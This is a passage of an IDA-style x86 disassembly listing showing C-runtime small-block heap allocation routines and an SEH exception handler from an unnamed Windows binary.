		mov	dword_428A8C, eax
		mov	dword_439010, edi

loc_40641F:				; CODE XREF: sub_406110+216j
		pop	ebx

loc_406420:				; CODE XREF: sub_406110+37j
		pop	edi
		pop	esi
		leave
		retn
sub_406110	endp


; =============== S U B	R O U T	I N E =======================================



sub_406424	proc near		; CODE XREF: sub_4068B9+C0p
		mov	eax, dword_43900C
		push	esi
		mov	esi, dword_438FFC
		push	edi
		xor	edi, edi
		cmp	esi, eax
		jnz	short loc_40646B
		add	eax, 10h
		imul	eax, 14h
		push	eax
		push	dword_439000
		push	edi
		push	dword_428A88
		call	ds:off_41E150
		cmp	eax, edi
		jnz	short loc_406459

loc_406455:				; CODE XREF: sub_406424+68j
					; sub_406424+94j
		xor	eax, eax
		jmp	short loc_4064D1
; ---------------------------------------------------------------------------

loc_406459:				; CODE XREF: sub_406424+2Fj
		add	dword_43900C, 10h
		mov	esi, dword_438FFC
		mov	dword_439000, eax

loc_40646B:				; CODE XREF: sub_406424+11j
		imul	esi, 14h
		add	esi, dword_439000
		push	41C4h
		push	8
		push	dword_428A88
		call	ds:dword_41E110	; RtlAllocateHeap
		cmp	eax, edi
		mov	[esi+10h], eax
		jz	short loc_406455
		push	4
		push	2000h
		push	100000h
		push	edi
		call	ds:off_41E154
		cmp	eax, edi
		mov	[esi+0Ch], eax
		jnz	short loc_4064BA
		push	dword ptr [esi+10h]
		push	edi
		push	dword_428A88
		call	ds:dword_41E108	; RtlFreeHeap
		jmp	short loc_406455
; ---------------------------------------------------------------------------

loc_4064BA:				; CODE XREF: sub_406424+82j
		or	dword ptr [esi+8], 0FFFFFFFFh
		mov	[esi], edi
		mov	[esi+4], edi
		inc	dword_438FFC
		mov	eax, [esi+10h]
		or	dword ptr [eax], 0FFFFFFFFh
		mov	eax, esi

loc_4064D1:				; CODE XREF: sub_406424+33j
		pop	edi
		pop	esi
		retn
sub_406424	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4064D4	proc near		; CODE XREF: sub_4068B9+D6p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+8]
		push	ebx
		push	esi
		mov	esi, [ecx+10h]
		push	edi
		xor	ebx, ebx
		jmp	short loc_4064EC
; ---------------------------------------------------------------------------

loc_4064E9:				; CODE XREF: sub_4064D4+1Aj
		add	eax, eax
		inc	ebx

loc_4064EC:				; CODE XREF: sub_4064D4+13j
		test	eax, eax
		jge	short loc_4064E9
		mov	eax, ebx
		imul	eax, 204h
		lea	eax, [eax+esi+144h]
		push	3Fh
		mov	[ebp+var_8], eax
		pop	edx

loc_406505:				; CODE XREF: sub_4064D4+3Bj
		mov	[eax+8], eax
		mov	[eax+4], eax
		add	eax, 8
		dec	edx
		jnz	short loc_406505
		push	4
		mov	edi, ebx
		push	1000h
		shl	edi, 0Fh
		add	edi, [ecx+0Ch]
		push	8000h
		push	edi
		call	ds:off_41E154
		test	eax, eax
		jnz	short loc_406538
		or	eax, 0FFFFFFFFh
		jmp	loc_4065D5
; ---------------------------------------------------------------------------

loc_406538:				; CODE XREF: sub_4064D4+5Aj
		lea	edx, [edi+7000h]
		cmp	edi, edx
		mov	[ebp+var_4], edx
		ja	short loc_406588
		mov	ecx, edx
		sub	ecx, edi
		shr	ecx, 0Ch
		lea	eax, [edi+10h]
		inc	ecx

loc_406550:				; CODE XREF: sub_4064D4+AFj
		or	dword ptr [eax-8], 0FFFFFFFFh
		or	dword ptr [eax+0FECh], 0FFFFFFFFh
		lea	edx, [eax+0FFCh]
		mov	[eax], edx
		lea	edx, [eax-1004h]
		mov	dword ptr [eax-4], 0FF0h
		mov	[eax+4], edx
		mov	dword ptr [eax+0FE8h], 0FF0h
		add	eax, 1000h
		dec	ecx
		jnz	short loc_406550
		mov	edx, [ebp+var_4]

loc_406588:				; CODE XREF: sub_4064D4+6Fj
		mov	eax, [ebp+var_8]
		add	eax, 1F8h
		lea	ecx, [edi+0Ch]
		mov	[eax+4], ecx
		mov	[ecx+8], eax
		lea	ecx, [edx+0Ch]
		mov	[eax+8], ecx
		mov	[ecx+4], eax
		and	dword ptr [esi+ebx*4+44h], 0
		xor	edi, edi
		inc	edi
		mov	[esi+ebx*4+0C4h], edi
		mov	al, [esi+43h]
		mov	cl, al
		inc	cl
		test	al, al
		mov	eax, [ebp+arg_0]
		mov	[esi+43h], cl
		jnz	short loc_4065C5
		or	[eax+4], edi

loc_4065C5:				; CODE XREF: sub_4064D4+ECj
		mov	edx, 80000000h
		mov	ecx, ebx
		shr	edx, cl
		not	edx
		and	[eax+8], edx
		mov	eax, ebx

loc_4065D5:				; CODE XREF: sub_4064D4+5Fj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4064D4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4065DA	proc near		; CODE XREF: sub_40E02D+77p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+10h]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, [ebp+arg_4]
		mov	edx, edi
		sub	edx, [ecx+0Ch]
		add	esi, 17h
		shr	edx, 0Fh
		mov	ecx, edx
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_C], ecx
		mov	ecx, [edi-4]
		and	esi, 0FFFFFFF0h
		dec	ecx
		cmp	esi, ecx
		lea	edi, [ecx+edi-4]
		mov	ebx, [edi]
		mov	[ebp+arg_8], ecx
		mov	[ebp+var_4], ebx
		jle	loc_40677C
		test	bl, 1
		jnz	loc_406775
		add	ebx, ecx
		cmp	esi, ebx
		jg	loc_406775
		mov	ecx, [ebp+var_4]
		sar	ecx, 4
		dec	ecx
		cmp	ecx, 3Fh
		mov	[ebp+var_8], ecx
		jbe	short loc_40664F
		push	3Fh
		pop	ecx
		mov	[ebp+var_8], ecx

loc_40664F:				; CODE XREF: sub_4065DA+6Dj
		mov	ebx, [edi+4]
		cmp	ebx, [edi+8]
		jnz	short loc_40669A
		cmp	ecx, 20h
		mov	ebx, 80000000h
		jnb	short loc_40667B
		shr	ebx, cl
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+eax+4]
		not	ebx
		and	[eax+edx*4+44h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_40669A
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_40669A
; ---------------------------------------------------------------------------

loc_40667B:				; CODE XREF: sub_4065DA+85j
		add	ecx, 0FFFFFFE0h
		shr	ebx, cl
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+eax+4]
		not	ebx
		and	[eax+edx*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_40669A
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_40669A:				; CODE XREF: sub_4065DA+7Bj
					; sub_4065DA+98j ...
		mov	ecx, [edi+8]
		mov	ebx, [edi+4]
		mov	[ecx+4], ebx
		mov	ecx, [edi+4]
		mov	edi, [edi+8]
		mov	[ecx+8], edi
		mov	ecx, [ebp+arg_8]
		sub	ecx, esi
		add	[ebp+var_4], ecx
		cmp	[ebp+var_4], 0
		jle	loc_406763
		mov	edi, [ebp+var_4]
		mov	ecx, [ebp+arg_4]
		sar	edi, 4
		dec	edi
		cmp	edi, 3Fh
		lea	ecx, [ecx+esi-4]
		jbe	short loc_4066D4
		push	3Fh
		pop	edi

loc_4066D4:				; CODE XREF: sub_4065DA+F5j
		mov	ebx, [ebp+var_C]
		lea	ebx, [ebx+edi*8]
		mov	[ebp+arg_8], ebx
		mov	ebx, [ebx+4]
		mov	[ecx+4], ebx
		mov	ebx, [ebp+arg_8]
		mov	[ecx+8], ebx
		mov	[ebx+4], ecx
		mov	ebx, [ecx+4]
		mov	[ebx+8], ecx
		mov	ebx, [ecx+4]
		cmp	ebx, [ecx+8]
		jnz	short loc_406751
		mov	cl, [edi+eax+4]
		mov	byte ptr [ebp+arg_8+3],	cl
		inc	cl
		cmp	edi, 20h
		mov	[edi+eax+4], cl
		jnb	short loc_406728
		cmp	byte ptr [ebp+arg_8+3],	0
		jnz	short loc_406720
		mov	ecx, edi
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], ebx

loc_406720:				; CODE XREF: sub_4065DA+136j
		lea	eax, [eax+edx*4+44h]
		mov	ecx, edi
		jmp	short loc_406748
; ---------------------------------------------------------------------------

loc_406728:				; CODE XREF: sub_4065DA+130j
		cmp	byte ptr [ebp+arg_8+3],	0
		jnz	short loc_40673E
		lea	ecx, [edi-20h]
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], ebx

loc_40673E:				; CODE XREF: sub_4065DA+152j
		lea	eax, [eax+edx*4+0C4h]
		lea	ecx, [edi-20h]

loc_406748:				; CODE XREF: sub_4065DA+14Cj
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax], edx

loc_406751:				; CODE XREF: sub_4065DA+11Ej
		mov	edx, [ebp+arg_4]
		mov	ecx, [ebp+var_4]
		lea	eax, [edx+esi-4]
		mov	[eax], ecx
		mov	[ecx+eax-4], ecx
		jmp	short loc_406766
; ---------------------------------------------------------------------------

loc_406763:				; CODE XREF: sub_4065DA+DEj
		mov	edx, [ebp+arg_4]

loc_406766:				; CODE XREF: sub_4065DA+187j
		lea	eax, [esi+1]
		mov	[edx-4], eax
		mov	[edx+esi-8], eax
		jmp	loc_4068B1
; ---------------------------------------------------------------------------

loc_406775:				; CODE XREF: sub_4065DA+50j
					; sub_4065DA+5Aj
		xor	eax, eax
		jmp	loc_4068B4
; ---------------------------------------------------------------------------

loc_40677C:				; CODE XREF: sub_4065DA+47j
		jge	loc_4068B1
		mov	ebx, [ebp+arg_4]
		sub	[ebp+arg_8], esi
		lea	ecx, [esi+1]
		mov	[ebx-4], ecx
		lea	ebx, [ebx+esi-4]
		mov	esi, [ebp+arg_8]
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		mov	[ebp+arg_4], ebx
		mov	[ebx-4], ecx
		jbe	short loc_4067A7
		push	3Fh
		pop	esi

loc_4067A7:				; CODE XREF: sub_4065DA+1C8j
		test	byte ptr [ebp+var_4], 1
		jnz	loc_406831
		mov	esi, [ebp+var_4]
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		jbe	short loc_4067C0
		push	3Fh
		pop	esi

loc_4067C0:				; CODE XREF: sub_4065DA+1E1j
		mov	ecx, [edi+4]
		cmp	ecx, [edi+8]
		jnz	short loc_40680A
		cmp	esi, 20h
		mov	ebx, 80000000h
		jnb	short loc_4067EB
		mov	ecx, esi
		shr	ebx, cl
		lea	esi, [esi+eax+4]
		not	ebx
		and	[eax+edx*4+44h], ebx
		dec	byte ptr [esi]
		jnz	short loc_406807
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_406807
; ---------------------------------------------------------------------------

loc_4067EB:				; CODE XREF: sub_4065DA+1F6j
		lea	ecx, [esi-20h]
		shr	ebx, cl
		lea	ecx, [esi+eax+4]
		not	ebx
		and	[eax+edx*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_406807
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_406807:				; CODE XREF: sub_4065DA+208j
					; sub_4065DA+20Fj ...
		mov	ebx, [ebp+arg_4]

loc_40680A:				; CODE XREF: sub_4065DA+1ECj
		mov	ecx, [edi+8]
		mov	esi, [edi+4]
		mov	[ecx+4], esi
		mov	esi, [edi+8]
		mov	ecx, [edi+4]
		mov	[ecx+8], esi
		mov	esi, [ebp+arg_8]
		add	esi, [ebp+var_4]
		mov	[ebp+arg_8], esi
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		jbe	short loc_406831
		push	3Fh
		pop	esi

loc_406831:				; CODE XREF: sub_4065DA+1D1j
					; sub_4065DA+252j
		mov	ecx, [ebp+var_C]
		lea	ecx, [ecx+esi*8]
		mov	edi, [ecx+4]
		mov	[ebx+8], ecx
		mov	[ebx+4], edi
		mov	[ecx+4], ebx
		mov	ecx, [ebx+4]
		mov	[ecx+8], ebx
		mov	ecx, [ebx+4]
		cmp	ecx, [ebx+8]
		jnz	short loc_4068A8
		mov	cl, [esi+eax+4]
		mov	byte ptr [ebp+arg_4+3],	cl
		inc	cl
		cmp	esi, 20h
		mov	[esi+eax+4], cl
		jnb	short loc_40687F
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406877
		mov	ecx, esi
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], edi

loc_406877:				; CODE XREF: sub_4065DA+28Dj
		lea	eax, [eax+edx*4+44h]
		mov	ecx, esi
		jmp	short loc_40689F
; ---------------------------------------------------------------------------

loc_40687F:				; CODE XREF: sub_4065DA+287j
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406895
		lea	ecx, [esi-20h]
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], edi

loc_406895:				; CODE XREF: sub_4065DA+2A9j
		lea	eax, [eax+edx*4+0C4h]
		lea	ecx, [esi-20h]

loc_40689F:				; CODE XREF: sub_4065DA+2A3j
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax], edx

loc_4068A8:				; CODE XREF: sub_4065DA+275j
		mov	eax, [ebp+arg_8]
		mov	[ebx], eax
		mov	[eax+ebx-4], eax

loc_4068B1:				; CODE XREF: sub_4065DA+196j
					; sub_4065DA:loc_40677Cj
		xor	eax, eax
		inc	eax

loc_4068B4:				; CODE XREF: sub_4065DA+19Dj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4065DA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4068B9	proc near		; CODE XREF: sub_403C1F+28p
					; sub_40DF0F+88p ...

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		mov	eax, dword_438FFC
		mov	ecx, [ebp+arg_0]
		imul	eax, 14h
		add	eax, dword_439000
		add	ecx, 17h
		and	ecx, 0FFFFFFF0h
		mov	[ebp+var_10], ecx
		sar	ecx, 4
		push	ebx
		dec	ecx
		cmp	ecx, 20h
		push	esi
		push	edi
		jge	short loc_4068F0
		or	esi, 0FFFFFFFFh
		shr	esi, cl
		or	[ebp+var_8], 0FFFFFFFFh
		jmp	short loc_4068FD
; ---------------------------------------------------------------------------

loc_4068F0:				; CODE XREF: sub_4068B9+2Aj
		add	ecx, 0FFFFFFE0h
		or	edx, 0FFFFFFFFh
		xor	esi, esi
		shr	edx, cl
		mov	[ebp+var_8], edx

loc_4068FD:				; CODE XREF: sub_4068B9+35j
		mov	ecx, dword_439008
		mov	ebx, ecx
		jmp	short loc_406918
; ---------------------------------------------------------------------------

loc_406907:				; CODE XREF: sub_4068B9+64j
		mov	edx, [ebx+4]
		mov	edi, [ebx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_40691F
		add	ebx, 14h

loc_406918:				; CODE XREF: sub_4068B9+4Cj
		cmp	ebx, eax
		mov	[ebp+arg_0], ebx
		jb	short loc_406907

loc_40691F:				; CODE XREF: sub_4068B9+5Aj
		cmp	ebx, eax
		jnz	short loc_4069A2
		mov	ebx, dword_439000
		jmp	short loc_40693C
; ---------------------------------------------------------------------------

loc_40692B:				; CODE XREF: sub_4068B9+88j
		mov	edx, [ebx+4]
		mov	edi, [ebx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_406943
		add	ebx, 14h

loc_40693C:				; CODE XREF: sub_4068B9+70j
		cmp	ebx, ecx
		mov	[ebp+arg_0], ebx
		jb	short loc_40692B

loc_406943:				; CODE XREF: sub_4068B9+7Ej
		cmp	ebx, ecx
		jnz	short loc_4069A2
		jmp	short loc_406955
; ---------------------------------------------------------------------------

loc_406949:				; CODE XREF: sub_4068B9+9Ej
		cmp	dword ptr [ebx+8], 0
		jnz	short loc_406959
		add	ebx, 14h
		mov	[ebp+arg_0], ebx

loc_406955:				; CODE XREF: sub_4068B9+8Ej
		cmp	ebx, eax
		jb	short loc_406949

loc_406959:				; CODE XREF: sub_4068B9+94j
		cmp	ebx, eax
		jnz	short loc_40698E
		mov	ebx, dword_439000
		jmp	short loc_40696E
; ---------------------------------------------------------------------------

loc_406965:				; CODE XREF: sub_4068B9+BAj
		cmp	dword ptr [ebx+8], 0
		jnz	short loc_406975
		add	ebx, 14h

loc_40696E:				; CODE XREF: sub_4068B9+AAj
		cmp	ebx, ecx
		mov	[ebp+arg_0], ebx
		jb	short loc_406965

loc_406975:				; CODE XREF: sub_4068B9+B0j
		cmp	ebx, ecx
		jnz	short loc_40698E
		call	sub_406424
		mov	ebx, eax
		test	ebx, ebx
		mov	[ebp+arg_0], ebx
		jnz	short loc_40698E

loc_406987:				; CODE XREF: sub_4068B9+E7j
		xor	eax, eax
		jmp	loc_406B97
; ---------------------------------------------------------------------------

loc_40698E:				; CODE XREF: sub_4068B9+A2j
					; sub_4068B9+BEj ...
		push	ebx
		call	sub_4064D4
		pop	ecx
		mov	ecx, [ebx+10h]
		mov	[ecx], eax
		mov	eax, [ebx+10h]
		cmp	dword ptr [eax], 0FFFFFFFFh
		jz	short loc_406987

loc_4069A2:				; CODE XREF: sub_4068B9+68j
					; sub_4068B9+8Cj
		mov	dword_439008, ebx
		mov	eax, [ebx+10h]
		mov	edx, [eax]
		cmp	edx, 0FFFFFFFFh
		mov	[ebp+var_4], edx
		jz	short loc_4069C9
		mov	ecx, [eax+edx*4+0C4h]
		mov	edi, [eax+edx*4+44h]
		and	ecx, [ebp+var_8]
		and	edi, esi
		or	ecx, edi
		jnz	short loc_4069F2

loc_4069C9:				; CODE XREF: sub_4068B9+FAj
		and	[ebp+var_4], 0
		mov	edx, [eax+0C4h]
		lea	ecx, [eax+44h]

loc_4069D6:				; CODE XREF: sub_4068B9+134j
		mov	edi, [ecx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_4069EF
		inc	[ebp+var_4]
		mov	edx, [ecx+84h]
		add	ecx, 4
		jmp	short loc_4069D6
; ---------------------------------------------------------------------------

loc_4069EF:				; CODE XREF: sub_4068B9+126j
		mov	edx, [ebp+var_4]

loc_4069F2:				; CODE XREF: sub_4068B9+10Ej
		mov	ecx, edx
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_C], ecx
		mov	ecx, [eax+edx*4+44h]
		xor	edi, edi
		and	ecx, esi
		jnz	short loc_406A20
		mov	ecx, [eax+edx*4+0C4h]
		and	ecx, [ebp+var_8]
		push	20h
		pop	edi
		jmp	short loc_406A20
; ---------------------------------------------------------------------------

loc_406A1D:				; CODE XREF: sub_4068B9+169j
		add	ecx, ecx
		inc	edi

loc_406A20:				; CODE XREF: sub_4068B9+153j
					; sub_4068B9+162j
		test	ecx, ecx
		jge	short loc_406A1D
		mov	ecx, [ebp+var_C]
		mov	edx, [ecx+edi*8+4]
		mov	ecx, [edx]
		sub	ecx, [ebp+var_10]
		mov	esi, ecx
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		mov	[ebp+var_8], ecx
		jle	short loc_406A41
		push	3Fh
		pop	esi

loc_406A41:				; CODE XREF: sub_4068B9+183j
		cmp	esi, edi
		jz	loc_406B4A
		mov	ecx, [edx+4]
		cmp	ecx, [edx+8]
		jnz	short loc_406AAD
		cmp	edi, 20h
		mov	ebx, 80000000h
		jge	short loc_406A81
		mov	ecx, edi
		shr	ebx, cl
		mov	ecx, [ebp+var_4]
		lea	edi, [eax+edi+4]
		not	ebx
		mov	[ebp+var_14], ebx
		and	ebx, [eax+ecx*4+44h]
		mov	[eax+ecx*4+44h], ebx
		dec	byte ptr [edi]
		jnz	short loc_406AAA
		mov	ecx, [ebp+var_14]
		mov	ebx, [ebp+arg_0]
		and	[ebx], ecx
		jmp	short loc_406AAD
; ---------------------------------------------------------------------------

loc_406A81:				; CODE XREF: sub_4068B9+1A0j
		lea	ecx, [edi-20h]
		shr	ebx, cl
		mov	ecx, [ebp+var_4]
		lea	ecx, [eax+ecx*4+0C4h]
		lea	edi, [eax+edi+4]
		not	ebx
		and	[ecx], ebx
		dec	byte ptr [edi]
		mov	[ebp+var_14], ebx
		jnz	short loc_406AAA
		mov	ebx, [ebp+arg_0]
		mov	ecx, [ebp+var_14]
		and	[ebx+4], ecx
		jmp	short loc_406AAD
; ---------------------------------------------------------------------------

loc_406AAA:				; CODE XREF: sub_4068B9+1BCj
					; sub_4068B9+1E4j
		mov	ebx, [ebp+arg_0]

loc_406AAD:				; CODE XREF: sub_4068B9+196j
					; sub_4068B9+1C6j ...
		cmp	[ebp+var_8], 0
		mov	ecx, [edx+8]
		mov	edi, [edx+4]
		mov	[ecx+4], edi
		mov	ecx, [edx+4]
		mov	edi, [edx+8]
		mov	[ecx+8], edi
		jz	loc_406B56
		mov	ecx, [ebp+var_C]
		lea	ecx, [ecx+esi*8]
		mov	edi, [ecx+4]
		mov	[edx+8], ecx
		mov	[edx+4], edi
		mov	[ecx+4], edx
		mov	ecx, [edx+4]
		mov	[ecx+8], edx
		mov	ecx, [edx+4]
		cmp	ecx, [edx+8]
		jnz	short loc_406B47
		mov	cl, [esi+eax+4]
		mov	byte ptr [ebp+arg_0+3],	cl
		inc	cl
		cmp	esi, 20h
		mov	[esi+eax+4], cl
		jge	short loc_406B1E
		cmp	byte ptr [ebp+arg_0+3],	0
		jnz	short loc_406B0C
		mov	edi, 80000000h
		mov	ecx, esi
		shr	edi, cl
		or	[ebx], edi

loc_406B0C:				; CODE XREF: sub_4068B9+246j
		mov	ecx, esi
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+var_4]
		or	[eax+ecx*4+44h], edi
		jmp	short loc_406B47
; ---------------------------------------------------------------------------

loc_406B1E:				; CODE XREF: sub_4068B9+240j
		cmp	byte ptr [ebp+arg_0+3],	0
		jnz	short loc_406B31
		lea	ecx, [esi-20h]
		mov	edi, 80000000h
		shr	edi, cl
		or	[ebx+4], edi

loc_406B31:				; CODE XREF: sub_4068B9+269j
		mov	ecx, [ebp+var_4]
		lea	edi, [eax+ecx*4+0C4h]
		lea	ecx, [esi-20h]
		mov	esi, 80000000h
		shr	esi, cl
		or	[edi], esi

loc_406B47:				; CODE XREF: sub_4068B9+22Ej
					; sub_4068B9+263j
		mov	ecx, [ebp+var_8]

loc_406B4A:				; CODE XREF: sub_4068B9+18Aj
		test	ecx, ecx
		jz	short loc_406B59
		mov	[edx], ecx
		mov	[ecx+edx-4], ecx
		jmp	short loc_406B59
; ---------------------------------------------------------------------------

loc_406B56:				; CODE XREF: sub_4068B9+20Aj
		mov	ecx, [ebp+var_8]

loc_406B59:				; CODE XREF: sub_4068B9+293j
					; sub_4068B9+29Bj
		mov	esi, [ebp+var_10]
		add	edx, ecx
		lea	ecx, [esi+1]
		mov	[edx], ecx
		mov	[edx+esi-4], ecx
		mov	esi, [ebp+var_C]
		mov	ecx, [esi]
		test	ecx, ecx
		lea	edi, [ecx+1]
		mov	[esi], edi
		jnz	short loc_406B8F
		cmp	ebx, dword_428A8C
		jnz	short loc_406B8F
		mov	ecx, [ebp+var_4]
		cmp	ecx, dword_439010
		jnz	short loc_406B8F
		and	dword_428A8C, 0

loc_406B8F:				; CODE XREF: sub_4068B9+2BAj
					; sub_4068B9+2C2j ...
		mov	ecx, [ebp+var_4]
		mov	[eax], ecx
		lea	eax, [edx+4]

loc_406B97:				; CODE XREF: sub_4068B9+D0j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4068B9	endp

; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_406C00	proc near		; DATA XREF: __SEH_prolog4o

var_11		= byte ptr -11h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00408C91 SIZE 00000019 BYTES

		sub	esp, 14h
		push	ebx
		mov	ebx, [esp+18h+arg_4]
		push	ebp
		push	esi
		mov	esi, [ebx+8]
		xor	esi, dword_424064
		push	edi
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		mov	[esp+24h+var_11], 0
		mov	[esp+24h+var_C], 1
		lea	edi, [ebx+10h]
		jz	short loc_406C38
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406C38:				; CODE XREF: sub_406C00+29j
		mov	ecx, [esi+0Ch]
		mov	eax, [esi+8]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E
		mov	eax, [esp+24h+arg_0]
		test	byte ptr [eax+4], 66h
		jnz	loc_406D75
		mov	ebp, [ebx+0Ch]
		cmp	ebp, 0FFFFFFFEh
		mov	ecx, [esp+24h+arg_8]
		lea	edx, [esp+24h+var_8]
		mov	[esp+24h+var_8], eax
		mov	[esp+24h+var_4], ecx
		mov	[ebx-4], edx
		jz	short loc_406CCF

loc_406C71:				; CODE XREF: sub_406C00+A2j
		lea	eax, [ebp+ebp*2+0]
		mov	ecx, [esi+eax*4+14h]
		test	ecx, ecx
		lea	ebx, [esi+eax*4+10h]
		mov	eax, [ebx]
		mov	[esp+24h+var_10], eax
		jz	short loc_406C9D
		mov	edx, edi
		call	sub_408C7A
		test	eax, eax
		mov	[esp+24h+var_11], 1
		jl	short loc_406CDB
		jg	short loc_406CE5
		mov	eax, [esp+24h+var_10]

loc_406C9D:				; CODE XREF: sub_406C00+85j
		cmp	eax, 0FFFFFFFEh
		mov	ebp, eax
		jnz	short loc_406C71
		cmp	[esp+24h+var_11], 0
		jz	short loc_406CCF

loc_406CAB:				; CODE XREF: sub_406C00+E3j
					; sub_406C00+191j
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		jz	short loc_406CBF
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406CBF:				; CODE XREF: sub_406C00+B0j
		mov	ecx, [esi+0Ch]
		mov	eax, [esi+8]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406CCF:				; CODE XREF: sub_406C00+6Fj
					; sub_406C00+A9j ...
		mov	eax, [esp+24h+var_C]
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 14h
		retn
; ---------------------------------------------------------------------------

loc_406CDB:				; CODE XREF: sub_406C00+95j
		mov	[esp+24h+var_C], 0
		jmp	short loc_406CAB
; ---------------------------------------------------------------------------

loc_406CE5:				; CODE XREF: sub_406C00+97j
		mov	ecx, [esp+24h+arg_0]
		cmp	dword ptr [ecx], 0E06D7363h
		jnz	short loc_406D1B
		cmp	ds:off_41EC3C, 0
		jz	short loc_406D1B
		push	offset off_41EC3C
		call	sub_40D212
		add	esp, 4
		test	eax, eax
		jz	short loc_406D1B
		mov	edx, [esp+24h+arg_0]
		push	1
		push	edx
		call	ds:off_41EC3C
		add	esp, 8

loc_406D1B:				; CODE XREF: sub_406C00+EFj
					; sub_406C00+F8j ...
		mov	ecx, [esp+24h+arg_4]
		call	sub_408CAA
		mov	eax, [esp+24h+arg_4]
		cmp	[eax+0Ch], ebp
		jz	short loc_406D40
		push	offset dword_424064
		push	edi
		mov	edx, ebp
		mov	ecx, eax
		call	sub_408CC4
		mov	eax, [esp+24h+arg_4]

loc_406D40:				; CODE XREF: sub_406C00+12Bj
		mov	ecx, [esp+24h+var_10]
		mov	[eax+0Ch], ecx
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		jz	short loc_406D5B
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406D5B:				; CODE XREF: sub_406C00+14Cj
		mov	ecx, [esi+0Ch]
		mov	edx, [esi+8]
		add	ecx, edi
		xor	ecx, [edx+edi]
		call	sub_402C9E
		mov	ecx, [ebx+8]
		mov	edx, edi
		jmp	loc_408C91
; ---------------------------------------------------------------------------

loc_406D75:				; CODE XREF: sub_406C00+50j
		cmp	dword ptr [ebx+0Ch], 0FFFFFFFEh
		jz	loc_406CCF
		push	offset dword_424064
		push	edi
		mov	ecx, ebx
		mov	edx, 0FFFFFFFEh
		call	sub_408CC4
		jmp	loc_406CAB
sub_406C00	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406D96	proc near		; CODE XREF: sub_40307C+9Fp
					; sub_403643+6Ep ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	esi
		mov	esi, [ebp+arg_4]
		push	esi
		call	sub_408FE0
		mov	[ebp+arg_4], eax
		mov	eax, [esi+0Ch]
		test	al, 82h
		pop	ecx
		jnz	short loc_406DC6
		call	sub_405D93
